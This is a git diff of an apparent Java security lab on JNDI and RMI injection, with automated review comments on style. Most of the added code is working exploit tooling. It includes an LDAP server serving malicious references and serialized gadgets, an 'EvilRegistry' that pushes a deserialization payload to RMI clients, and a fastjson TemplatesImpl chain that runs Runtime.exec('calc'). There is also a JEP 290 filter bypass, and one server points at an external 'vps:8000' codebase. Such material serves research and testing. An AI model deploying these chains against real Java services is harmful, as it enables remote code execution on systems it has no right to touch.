diff --git a/JNDI/JNDI/pom.xml b/JNDI/JNDI/pom.xml index fa7063a..1a7687f 100644 --- a/JNDI/JNDI/pom.xml +++ b/JNDI/JNDI/pom.xml @@ -4,7 +4,7 @@ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - com.example + com.test JNDI 1.0-SNAPSHOT @@ -14,12 +14,47 @@ UTF-8 - - - com.unboundid - unboundid-ldapsdk - 3.2.0 - - + + + com.alibaba + fastjson + 1.2.47 + + + org.javassist + javassist + 3.30.2-GA + + + org.slf4j + slf4j-api + 2.0.17 + + + org.apache.tomcat.embed + tomcat-embed-core + 9.0.38 + + + com.h2database + h2 + 2.3.232 + + + org.hsqldb + hsqldb + 2.7.3 + + + com.alibaba + druid + 1.2.23 + + + com.unboundid + unboundid-ldapsdk + 3.2.0 + + \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java b/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java deleted file mode 100644 index 4118c5a..0000000 --- a/JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java +++ /dev/null @@ -1,36 +0,0 @@ -package JNDI_Develop; - -import javax.naming.Context; -import javax.naming.NamingException; -import javax.naming.directory.Attributes; -import javax.naming.directory.DirContext; -import javax.naming.directory.InitialDirContext; -import java.util.Hashtable; - - -public class DNSContextFactoryTest { - public static void main(String[] args) { - // 创建环境变量对象 - Hashtable env = new Hashtable(); - - // 设置JNDI初始化工厂类名 - env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.dns.DnsContextFactory"); - - // 设置JNDI提供服务的URL地址,这里可以设置解析的DNS服务器地址 - env.put(Context.PROVIDER_URL, "dns://114.114.114.114/"); - - try { - // 创建JNDI目录服务对象 - DirContext context = new InitialDirContext(env); - - // 获取DNS解析记录测试 - Attributes attrs1 = context.getAttributes("baidu.com", new String[]{"A"}); - Attributes attrs2 = context.getAttributes("qq.com", new String[]{"A"}); - - System.out.println(attrs1); - System.out.println(attrs2); - } catch (NamingException e) { - e.printStackTrace(); - } - } -} 
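Review bot: The new dependency block pins several libraries to older releases (fastjson 1.2.47, tomcat-embed-core 9.0.38, hsqldb 2.7.3, druid 1.2.23, unboundid-ldapsdk 3.2.0) without saying why; if they are deliberately old so the study reproduces a specific behaviour, each such dependency should carry a comment like `<!-- intentionally pinned for this study; do not bump -->` so automated dependency updaters and later readers do not treat the pins as oversights. The groupId change from `com.example` to `com.test` in the first hunk is not mentioned in the commit message. Within this chunk only unboundid and slf4j are visibly referenced by the added sources; whether javassist, tomcat-embed-core, h2, hsqldb and druid are actually used is worth confirming before they are kept.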
diff --git a/JNDI/JNDI_vul/client/src/main/java/InitialC.java b/JNDI/JNDI/src/main/java/JndiClient.java similarity index 53% rename from JNDI/JNDI_vul/client/src/main/java/InitialC.java rename to JNDI/JNDI/src/main/java/JndiClient.java index 4203ca3..6b264e7 100644 --- a/JNDI/JNDI_vul/client/src/main/java/InitialC.java +++ b/JNDI/JNDI/src/main/java/JndiClient.java @@ -1,9 +1,11 @@ import javax.naming.InitialContext; import javax.naming.NamingException; -public class InitialC { +public class JndiClient { public static void main(String[] args) throws NamingException { + String rmiHost = "rmi://127.0.0.1:1099/Calc123"; + String ldapHost = "ldap://127.0.0.1:1389/anything"; InitialContext initialContext = new InitialContext(); - initialContext.lookup("ldap://127.0.0.1:1389/Calc"); + initialContext.lookup(ldapHost); } } diff --git a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java similarity index 81% rename from JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java rename to JNDI/JNDI/src/main/java/LDAP/codebaseServer.java index 12d93df..726fd3d 100644 --- a/JNDI/JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java +++ b/JNDI/JNDI/src/main/java/LDAP/codebaseServer.java @@ -1,11 +1,5 @@ -package normal_ldap; +package LDAP; -import java.net.InetAddress; -import java.net.MalformedURLException; -import java.net.URL; -import javax.net.ServerSocketFactory; -import javax.net.SocketFactory; -import javax.net.ssl.SSLSocketFactory; import com.unboundid.ldap.listener.InMemoryDirectoryServer; import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; import com.unboundid.ldap.listener.InMemoryListenerConfig; 
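Review bot: `rmiHost` is assigned but never read in `JndiClient.main`, so it is dead code next to `ldapHost`, which is the only value passed to `lookup`; either drop it or make the selection explicit with one named local, e.g. `String target = ldapHost; // the lab server this client expects`, and pass `target` to `lookup`. A short class comment stating which local server each of the two URLs pairs with would make the intent clear without leaving an unused variable behind.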
@@ -15,25 +9,23 @@ import com.unboundid.ldap.sdk.LDAPException; import com.unboundid.ldap.sdk.LDAPResult; import com.unboundid.ldap.sdk.ResultCode; +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; -/** - * LDAP server implementation returning JNDI references - * - * @author mbechler - * - */ -public class JNDILdapServer { - +public class codebaseServer { private static final String LDAP_BASE = "dc=example,dc=com"; - public static void main (String[] args) { - int port = 1389; String url = "http://127.0.0.1:7777/#Calc"; + int port = 1389; try { InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); config.setListenerConfigs(new InMemoryListenerConfig( - "listen", //$NON-NLS-1$ - InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$ + "listen", + InetAddress.getByName("0.0.0.0"), port, ServerSocketFactory.getDefault(), SocketFactory.getDefault(), 
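Review bot: The rename to `codebaseServer` (and likewise `deserServer` later in this patch) breaks the UpperCamelCase class-name convention that `JndiClient` and `EvilRegistry` in the same patch follow; `CodebaseServer` and `DeserServer` would be consistent. This hunk also removes the original class Javadoc together with its `@author mbechler` attribution; if the file derives from that author's `JNDILdapServer`, its license may require the notice to stay, so I would keep at least `/** LDAP server returning JNDI references; derived from JNDILdapServer by mbechler. */` above the class. The `main` body continues past the end of this hunk.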
@@ -41,32 +33,23 @@ public static void main (String[] args) { config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); - System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$ + System.out.println("Listening on 0.0.0.0:" + port); ds.startListening(); - } catch ( Exception e ) { e.printStackTrace(); } } - private static class OperationInterceptor extends InMemoryOperationInterceptor { - private URL codebase; - /** - * - */ - public OperationInterceptor ( URL cb ) { + * */ public OperationInterceptor ( URL cb ) { this.codebase = cb; } - /** * {@inheritDoc} - * - * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) - */ - @Override + * * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override public void processSearchResult ( InMemoryInterceptedSearchResult result ) { String base = result.getRequest().getBaseDN(); Entry e = new Entry(base); 
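Review bot: The Javadoc reflow in this hunk leaves comment terminators on the same line as code, `* */ public OperationInterceptor ( URL cb ) {` and `*/ @Override`; it compiles, but it is hard to read and inconsistent with the rest of the file. Put `*/` on its own line before the constructor and before `@Override`, and since the constructor's Javadoc is now empty, drop that comment entirely. The same layout appears in `deserServer` in this patch. `processSearchResult`'s body continues past the end of this hunk.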
@@ -76,23 +59,22 @@ public void processSearchResult ( InMemoryInterceptedSearchResult result ) { catch ( Exception e1 ) { e1.printStackTrace(); } - } - protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException { URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); - e.addAttribute("javaClassName", "Calc"); + e.addAttribute("javaClassName", "Exploit"); String cbstring = this.codebase.toString(); int refPos = cbstring.indexOf('#'); if ( refPos > 0 ) { cbstring = cbstring.substring(0, refPos); } e.addAttribute("javaCodeBase", cbstring); - e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ + e.addAttribute("objectClass", "javaNamingReference"); e.addAttribute("javaFactory", this.codebase.getRef()); result.sendSearchEntry(e); result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); } + } } \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/LDAP/deserServer.java b/JNDI/JNDI/src/main/java/LDAP/deserServer.java new file mode 100644 index 0000000..2ce96bd --- /dev/null +++ b/JNDI/JNDI/src/main/java/LDAP/deserServer.java 
@@ -0,0 +1,111 @@ +package LDAP; + +import com.unboundid.util.Base64; +import com.unboundid.ldap.listener.InMemoryDirectoryServer; +import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; +import com.unboundid.ldap.listener.InMemoryListenerConfig; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPException; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import tools.PayloadGen; +import tools.ReflectTools; + +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; +import java.text.ParseException; + +public class deserServer { + + private static final String LDAP_BASE = "dc=example,dc=com"; + + + public static void main (String[] args) { + + String url = "http://vps:8000/#ExportObject"; + int port = 1389; + + + try { + InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); + config.setListenerConfigs(new InMemoryListenerConfig( + "listen", + InetAddress.getByName("0.0.0.0"), + port, + ServerSocketFactory.getDefault(), + SocketFactory.getDefault(), + (SSLSocketFactory) SSLSocketFactory.getDefault())); + + config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(url))); + InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); + System.out.println("Listening on 0.0.0.0:" + port); + ds.startListening(); + + } + catch ( Exception e ) { + e.printStackTrace(); + } + } + + private static class OperationInterceptor extends InMemoryOperationInterceptor { + + private URL codebase; + + + /** + * */ public OperationInterceptor ( URL cb ) { + this.codebase = cb; + } + + + /** + * {@inheritDoc} + * * @see 
com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult) + */ @Override + public void processSearchResult ( InMemoryInterceptedSearchResult result ) { + String base = result.getRequest().getBaseDN(); + Entry e = new Entry(base); + try { + sendResult(result, base, e); + } + catch ( Exception e1 ) { + e1.printStackTrace(); + } + + } + + + protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception { + URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class")); + System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); + e.addAttribute("javaClassName", "Exploit"); + String cbstring = this.codebase.toString(); + int refPos = cbstring.indexOf('#'); + if ( refPos > 0 ) { + cbstring = cbstring.substring(0, refPos); + } + + // Payload1: 利用LDAP+Reference Factory +// e.addAttribute("javaCodeBase", cbstring); +// e.addAttribute("objectClass", "javaNamingReference"); +// e.addAttribute("javaFactory", this.codebase.getRef()); + + // Payload2: 返回序列化Gadget + try { + e.addAttribute("javaSerializedData", ReflectTools.ser2bytes(PayloadGen.getPayload())); + } catch (ParseException exception) { + exception.printStackTrace(); + } + + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + + } +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/Client.java b/JNDI/JNDI/src/main/java/RMI/Client.java new file mode 100644 index 0000000..3ca3c85 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Client.java 
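Review bot: `com.unboundid.util.Base64` and `java.net.MalformedURLException` are imported but never used in `deserServer`, and the `try`/`catch (ParseException exception)` around `e.addAttribute("javaSerializedData", ...)` only prints the stack trace and then falls through to `result.sendSearchEntry(e)` and `ResultCode.SUCCESS`, so a failure to build the attribute is reported as success; since `sendResult` already declares `throws Exception`, the catch is redundant and the call can simply be left to propagate. A class-level Javadoc should also record that the commented-out "Payload1" block and the active "Payload2" block are alternative response modes and which one is in effect, since that is currently only recoverable from the comments inside `sendResult`.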
@@ -0,0 +1,23 @@ +package RMI; + +import java.rmi.NotBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; + +public class Client { + public static void main(String[] args) throws Exception { + serverAttackClientWithJRMP(); + } + + // 从registry获取的stub指向恶意skel,通过DGC JRMP,实现server打client + public static void serverAttackClientWithJRMP() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + registry.lookup("951d14"); + } + + public static void rmiDeser() throws Exception{ + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 50388); + registry.lookup("c4e578"); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java new file mode 100644 index 0000000..704bd81 --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/EvilRegistry.java 
@@ -0,0 +1,350 @@ +package RMI; + +import java.io.BufferedInputStream; +import java.io.BufferedOutputStream; +import java.io.DataInputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.io.ObjectStreamClass; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.net.Socket; +import java.net.SocketException; +import java.net.URL; +import java.net.URLClassLoader; +import java.rmi.MarshalException; +import java.rmi.server.ObjID; +import java.rmi.server.UID; +import javax.net.ServerSocketFactory; + +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import tools.PayloadGen; + +// 在client lookup后,直接返回恶意stub,进行反序列化 +public class EvilRegistry implements Runnable { + public static void main(String[] args) { + //before you start it, you should set vm options:"--add-opens=java.base/sun.nio.ch=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=jdk.unsupported/sun.misc=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED" + EvilRegistry.start(); + } + private static final Logger log = LoggerFactory.getLogger(EvilRegistry.class); + public String ip; + public int port; + private ServerSocket ss; + private final Object waitLock = new Object(); + private boolean exit; + private boolean hadConnection; + private static EvilRegistry serverInstance; + + public EvilRegistry(String ip, int port) { + try { + this.ip = ip; + this.port = port; + this.ss = ServerSocketFactory.getDefault().createServerSocket(this.port); + } catch (Exception e) { + e.printStackTrace(); + } + + } + + public static synchronized void start() { + serverInstance = new EvilRegistry("0.0.0.0", 8899); + Thread serverThread = new Thread(serverInstance); + serverThread.start(); + 
log.warn("[RMI RMI.Server] is already running."); + } + + public static synchronized void stop() { + if (serverInstance != null) { + serverInstance.exit = true; + + try { + serverInstance.ss.close(); + } catch (IOException e) { + e.printStackTrace(); + } + + serverInstance = null; + System.out.println("[RMI RMI.Server] stopped."); + } + + } + + public boolean waitFor(int i) { + try { + if (this.hadConnection) { + return true; + } else { + System.out.println("[RMI RMI.Server] Waiting for connection"); + synchronized(this.waitLock) { + this.waitLock.wait((long)i); + } + + return this.hadConnection; + } + } catch (InterruptedException var5) { + return false; + } + } + + public void close() { + this.exit = true; + + try { + this.ss.close(); + } catch (IOException var4) { + } + + synchronized(this.waitLock) { + this.waitLock.notify(); + } + } + + public void run() { + System.out.println("[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899"); + + try { + Socket s = null; + + try { + while(!this.exit && (s = this.ss.accept()) != null) { + try { + s.setSoTimeout(5000); + InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress(); + System.out.println("[RMI RMI.Server] Have connection from " + remote); + InputStream is = s.getInputStream(); + InputStream bufIn = (InputStream)(is.markSupported() ? 
is : new BufferedInputStream(is)); + bufIn.mark(4); + DataInputStream in = new DataInputStream(bufIn); + Throwable var6 = null; + + try { + int magic = in.readInt(); + short version = in.readShort(); + if (magic == 1246907721 && version == 2) { + OutputStream sockOut = s.getOutputStream(); + BufferedOutputStream bufOut = new BufferedOutputStream(sockOut); + DataOutputStream out = new DataOutputStream(bufOut); + Throwable var12 = null; + + try { + byte protocol = in.readByte(); + switch (protocol) { + case 75: + out.writeByte(78); + if (remote.getHostName() != null) { + out.writeUTF(remote.getHostName()); + } else { + out.writeUTF(remote.getAddress().toString()); + } + + out.writeInt(remote.getPort()); + out.flush(); + in.readUTF(); + in.readInt(); + case 76: + this.doMessage(s, in, out); + bufOut.flush(); + out.flush(); + break; + case 77: + default: + System.out.println("[RMI RMI.Server] Unsupported protocol"); + s.close(); + } + } catch (Throwable var88) { + var12 = var88; + throw var88; + } finally { + if (out != null) { + if (var12 != null) { + try { + out.close(); + } catch (Throwable var87) { + var12.addSuppressed(var87); + } + } else { + out.close(); + } + } + + } + } else { + s.close(); + } + } catch (Throwable var90) { + var6 = var90; + throw var90; + } finally { + if (in != null) { + if (var6 != null) { + try { + in.close(); + } catch (Throwable var86) { + var6.addSuppressed(var86); + } + } else { + in.close(); + } + } + + } + } catch (InterruptedException var92) { + return; + } catch (Exception e) { + e.printStackTrace(System.err); + } finally { + System.out.println("[RMI RMI.Server] Closing connection"); + s.close(); + } + } + + return; + } finally { + if (s != null) { + s.close(); + } + + if (this.ss != null) { + this.ss.close(); + } + + } + } catch (SocketException var96) { + } catch (Exception e) { + e.printStackTrace(System.err); + } + + } + + private void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + 
System.out.println("[RMI RMI.Server] Reading message..."); + int op = in.read(); + switch (op) { + case 80: + this.doCall(s, in, out); + break; + case 81: + case 83: + default: + throw new IOException("unknown transport op " + op); + case 82: + out.writeByte(83); + break; + case 84: + UID.read(in); + } + + s.close(); + } + + private void doCall(Socket s, DataInputStream in, DataOutputStream out) throws Exception { + ObjectInputStream ois = new ObjectInputStream(in) { + protected Class resolveClass(ObjectStreamClass desc) throws IOException { + if ("[Ljava.rmi.server.ObjID;".equals(desc.getName())) { + return ObjID[].class; + } else if ("java.rmi.server.ObjID".equals(desc.getName())) { + return ObjID.class; + } else if ("java.rmi.server.UID".equals(desc.getName())) { + return UID.class; + } else if ("java.lang.String".equals(desc.getName())) { + return String.class; + } else { + throw new IOException("Not allowed to read object"); + } + } + }; + + ObjID read; + try { + read = ObjID.read(ois); + } catch (IOException e) { + throw new MarshalException("unable to read objID", e); + } + + if (read.hashCode() == 2) { + handleDGC(ois); + } else if (read.hashCode() == 0) { + if (this.handleRMI(s, ois, out)) { + this.hadConnection = true; + synchronized(this.waitLock) { + this.waitLock.notifyAll(); + return; + } + } + + s.close(); + } + + } + + private boolean handleRMI(Socket s, ObjectInputStream ois, DataOutputStream out) throws Exception { + int method = ois.readInt(); + ois.readLong(); + if (method != 2) { + return false; + } else { + String object = (String)ois.readObject(); + out.writeByte(81); + + Object obj; + try (ObjectOutputStream oos = new MarshalOutputStream(out, "evil")) { + oos.writeByte(1); + (new UID()).write(oos); + String path = "/" + object; + System.out.println("[RMI RMI.Server] Send payloadData for " + path); + System.out.println(); + new Object(); + obj = PayloadGen.getPayload();//替换为序列化数据 + oos.writeObject(obj); + oos.flush(); + out.flush(); + return 
true; + } + } + } + private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException { + ois.readInt(); + ois.readLong(); + } + static final class MarshalOutputStream extends ObjectOutputStream { + private String sendUrl; + + public MarshalOutputStream(OutputStream out, String u) throws IOException { + super(out); + this.sendUrl = u; + } + + MarshalOutputStream(OutputStream out) throws IOException { + super(out); + } + + protected void annotateClass(Class cl) throws IOException { + if (this.sendUrl != null) { + this.writeObject(this.sendUrl); + } else if (!(cl.getClassLoader() instanceof URLClassLoader)) { + this.writeObject((Object)null); + } else { + URL[] us = ((URLClassLoader)cl.getClassLoader()).getURLs(); + String cb = ""; + + for(URL u : us) { + cb = cb + u.toString(); + } + + this.writeObject(cb); + } + + } + + protected void annotateProxyClass(Class cl) throws IOException { + this.annotateClass(cl); + } + } + + +} \ No newline at end of file diff --git a/JNDI/JNDI/src/main/java/RMI/MyRegistry.java b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java new file mode 100644 index 0000000..c70761c --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/MyRegistry.java @@ -0,0 +1,14 @@ +package RMI; + +import remoteObj.HelloImpl; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; + +public class MyRegistry { + public static void main(String[] args) throws RemoteException, AlreadyBoundException { + java.rmi.registry.Registry registry = LocateRegistry.createRegistry(1099); + registry.bind("hello", new HelloImpl()); + } +} diff --git a/JNDI/JNDI/src/main/java/RMI/Server.java b/JNDI/JNDI/src/main/java/RMI/Server.java new file mode 100644 index 0000000..d39d2de --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/Server.java 
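Review bot: `run()` prints `"[RMI RMI.Server] Listening on {}:{}" + "127.0.0.1" + "8899"`, which mixes SLF4J placeholder syntax into a `System.out.println` and hard-codes values that disagree with the `ip`/`port` fields the constructor stores, so the output is the literal `Listening on {}:{}127.0.0.18899`; use the logger already declared on the class, `log.info("[RMI RMI.Server] Listening on {}:{}", this.ip, this.port);`. Likewise `start()` calls `log.warn("[RMI RMI.Server] is already running.")` unconditionally right after spawning the thread, so the message is wrong on every call; it should fire only when `serverInstance != null` before the new instance is created, or read "started". The empty `catch (IOException var4) {}` in `close()` and the stray `new Object();` statement in `handleRMI` look like decompiler residue and should be removed or given a comment explaining why they stay.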
@@ -0,0 +1,78 @@ +package RMI; + +import com.alibaba.fastjson.JSONArray; +import remoteObj.HelloImpl; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; +import tools.ClassByteGen; +import tools.InvocationHandlerImpl; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.management.BadAttributeValueExpException; +import javax.xml.transform.Templates; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.ObjID; +import java.rmi.server.RemoteObjectInvocationHandler; +import java.util.Random; + +public class Server { + + public static void main(String[] args) throws Exception { + serverAttackRegistryWithJRMP(); + } + + // 正常绑定远程对象 + public static void bind() throws Exception { + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("HelloImpl", new HelloImpl()); + } + + + // fastjson原生反序列化触发getter,bind实现server打registry,适用于<8u121 + public static void serverAttackRegistryWithBind() throws Exception { + String code = "{\n" + + " Runtime.getRuntime().exec(\"calc\");\n" + + " }"; + byte[] bytes = ClassByteGen.getBytes(code, "AAAA"); + Templates templates = TemplatesGen.getTemplates(bytes, null); + JSONArray jsonArray = new JSONArray(); + jsonArray.add(templates); + + BadAttributeValueExpException bad = new BadAttributeValueExpException("aaa"); + ReflectTools.setFieldValue(bad, "val", jsonArray); + + InvocationHandlerImpl invocationHandler = new InvocationHandlerImpl(bad); + Remote o = (Remote) Proxy.newProxyInstance(invocationHandler.getClass().getClassLoader(), new Class[]{Remote.class}, invocationHandler); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil1", o); + } + + // 将stub里的skel地址指向恶意JRMP服务,实现server打registry + public static void serverAttackRegistryWithJRMP() throws Exception { + ObjID id = new ObjID(new 
Random().nextInt()); // RMI registry + TCPEndpoint te = new TCPEndpoint("127.0.0.1", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); + Registry proxy = (Registry) Proxy.newProxyInstance(Server.class.getClassLoader(), new Class[] { + Registry.class + }, obj); + + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099); + registry.bind("evil24", proxy); + } + + // 通过DGC JRMP实现registry打server + public static void registerAttackServer() throws Exception { + // java-chains启动恶意JRMP服务 + Registry registry = LocateRegistry.getRegistry("127.0.0.1", 13999); + HelloImpl hello = new HelloImpl(); + registry.bind("evil3", hello); + } + +} diff --git a/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java new file mode 100644 index 0000000..e78572b --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java 
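Review bot: `serverAttackRegistryWithBind` rebuilds the same `BadAttributeValueExpException` object that `tools.PayloadGen.getPayload()` (added later in this commit) already constructs — identical `code` string, `ClassByteGen.getBytes(code, "AAAA")`, `TemplatesGen.getTemplates(bytes, null)`, `JSONArray` wrapper and `setFieldValue(bad, "val", jsonArray)`. Replacing that block with `Object bad = PayloadGen.getPayload();` leaves a single definition to maintain and drops the then-unneeded `JSONArray`, `Templates`, `BadAttributeValueExpException`, `ClassByteGen` and `TemplatesGen` imports from this file. The same duplication applies to the `PayloadGen` hunk itself, which is the copy to keep.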
@@ -0,0 +1,73 @@ +package RMI; + +import sun.rmi.registry.RegistryImpl_Stub; +import sun.rmi.server.UnicastRef; +import sun.rmi.transport.LiveRef; +import sun.rmi.transport.tcp.TCPEndpoint; + +import java.io.ObjectOutput; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.Proxy; +import java.rmi.Remote; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import java.rmi.server.*; +import java.util.Random; + +// 绕过JEP290(8u231~8u240) +public class ServerBypassJEP290 { + public static void main(String[] args) throws Exception { + UnicastRemoteObject payload = getPayload(); + java.rmi.registry.Registry registry = LocateRegistry.getRegistry(1099); + bindReflection("pwn", payload, registry); + } + + static UnicastRemoteObject getPayload() throws Exception { + ObjID id = new ObjID(new Random().nextInt()); + TCPEndpoint te = new TCPEndpoint("localhost", 13999); + UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); + + System.getProperties().put("sun.misc.ProxyGenerator.saveGeneratedFiles", "true"); + RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(ref); + RMIServerSocketFactory factory = (RMIServerSocketFactory) Proxy.newProxyInstance( + handler.getClass().getClassLoader(), + new Class[]{RMIServerSocketFactory.class, Remote.class}, + handler + ); + + Constructor constructor = UnicastRemoteObject.class.getDeclaredConstructor(); + constructor.setAccessible(true); + UnicastRemoteObject unicastRemoteObject = constructor.newInstance(); + + Field field_ssf = UnicastRemoteObject.class.getDeclaredField("ssf"); + field_ssf.setAccessible(true); + field_ssf.set(unicastRemoteObject, factory); + + return unicastRemoteObject; + } + + static void bindReflection(String name, Object obj, Registry registry) throws Exception { + Field ref_filed = RemoteObject.class.getDeclaredField("ref"); + ref_filed.setAccessible(true); + UnicastRef ref = 
(UnicastRef) ref_filed.get(registry); + + Field operations_filed = RegistryImpl_Stub.class.getDeclaredField("operations"); + operations_filed.setAccessible(true); + Operation[] operations = (Operation[]) operations_filed.get(registry); + + RemoteCall remoteCall = ref.newCall((RemoteObject) registry, operations, 0, 4905912898345647071L); + ObjectOutput outputStream = remoteCall.getOutputStream(); + + Field enableReplace_filed = ObjectOutputStream.class.getDeclaredField("enableReplace"); + enableReplace_filed.setAccessible(true); + enableReplace_filed.setBoolean(outputStream, false); + + outputStream.writeObject(name); + outputStream.writeObject(obj); + + ref.invoke(remoteCall); + ref.done(remoteCall); + } +} diff --git a/JNDI/JNDI/src/main/java/RMIServer.java b/JNDI/JNDI/src/main/java/RMIServer.java new file mode 100644 index 0000000..d65eb3f --- /dev/null +++ b/JNDI/JNDI/src/main/java/RMIServer.java @@ -0,0 +1,18 @@ +import com.sun.jndi.rmi.registry.ReferenceWrapper; + +import java.rmi.AlreadyBoundException; +import java.rmi.RemoteException; +import java.rmi.registry.LocateRegistry; +import java.rmi.registry.Registry; +import javax.naming.NamingException; +import javax.naming.Reference; + +public class RMIServer { + public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException { + Registry registry = LocateRegistry.createRegistry(1099); + // factory表示加载的类的url和类名,所以恶意类文件必须以全类名命名 + Reference reference = new Reference("Calc1233", "Calc", "http://127.0.0.1:7777/"); + ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); + registry.bind("Calc123", referenceWrapper); + } +} diff --git a/JNDI/JNDI/src/main/java/remoteObj/Hello.java b/JNDI/JNDI/src/main/java/remoteObj/Hello.java new file mode 100644 index 0000000..83be131 --- /dev/null +++ b/JNDI/JNDI/src/main/java/remoteObj/Hello.java 
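Review bot: `Constructor constructor` in `getPayload()` is a raw type, so `constructor.newInstance()` yields `Object` and the assignment `UnicastRemoteObject unicastRemoteObject = constructor.newInstance();` does not appear to type-check as written; declare it as `Constructor<UnicastRemoteObject> constructor = UnicastRemoteObject.class.getDeclaredConstructor();`. The same method sets `System.getProperties().put("sun.misc.ProxyGenerator.saveGeneratedFiles", "true")`, which makes the JVM dump every generated proxy class to the working directory for the rest of the process; it is a debugging aid that is not needed for the proxy to be created and should be removed or made opt-in. The locals `ref_filed`, `operations_filed` and `enableReplace_filed` misspell "field" and break the file's camelCase convention (`refField`, `operationsField`, `enableReplaceField`).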
